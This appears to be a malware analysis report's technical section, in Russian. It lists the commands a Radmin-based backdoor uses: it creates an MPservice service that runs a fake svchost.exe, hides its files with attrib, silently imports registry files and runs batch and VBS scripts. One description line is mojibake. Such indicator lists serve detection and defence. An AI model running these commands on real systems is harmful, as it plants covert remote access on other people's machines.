Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\MPservice] 'Start' = '00000002'
- <DRIVERS>\sc.exe config wuauserv depend= MPservice
- <DRIVERS>\sc.exe start MPservice
- <DRIVERS>\svchost.exe /service
- <DRIVERS>\sc.exe description MPservice ╩╣╝╞╦у╗·╫╘╢п╩╩╙ж╙▓╝■╡─╕№╕─бг╓╨╓╣┤╦╖■╬ё╜л╩╣╧╡═│▓╗╬╚╢ибг
- <DRIVERS>\sc.exe stop r_server
- <DRIVERS>\sc.exe delete r_server
- <DRIVERS>\sc.exe create MPservice binpath= "<DRIVERS>\svchost.exe /service" type= own type= interact start= auto DisplayName= "plug"
- <SYSTEM32>\attrib.exe +h +r "<DRIVERS>\svchost.exe"
- <SYSTEM32>\attrib.exe +h +r "<DRIVERS>\AdmDll.dll"
- <SYSTEM32>\attrib.exe +h +r "<DRIVERS>\raddrv.dll"
- %WINDIR%\regedit.exe /s 8088.reg
- <SYSTEM32>\wscript.exe "<DRIVERS>\s.vbs"
- <SYSTEM32>\cmd.exe /c ""<DRIVERS>\s.bat" "
- %WINDIR%\regedit.exe /s radmin.reg
- <DRIVERS>\s.vbs
- <DRIVERS>\s.bat
- <DRIVERS>\8088.reg
- <DRIVERS>\sc.exe
- <DRIVERS>\AdmDll.dll
- <DRIVERS>\svchost.exe
- <DRIVERS>\radmin.reg
- <DRIVERS>\raddrv.dll
- <DRIVERS>\raddrv.dll
- <DRIVERS>\AdmDll.dll
- <DRIVERS>\svchost.exe
- <DRIVERS>\sc.exe
- <DRIVERS>\8088.reg
- <DRIVERS>\radmin.reg
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''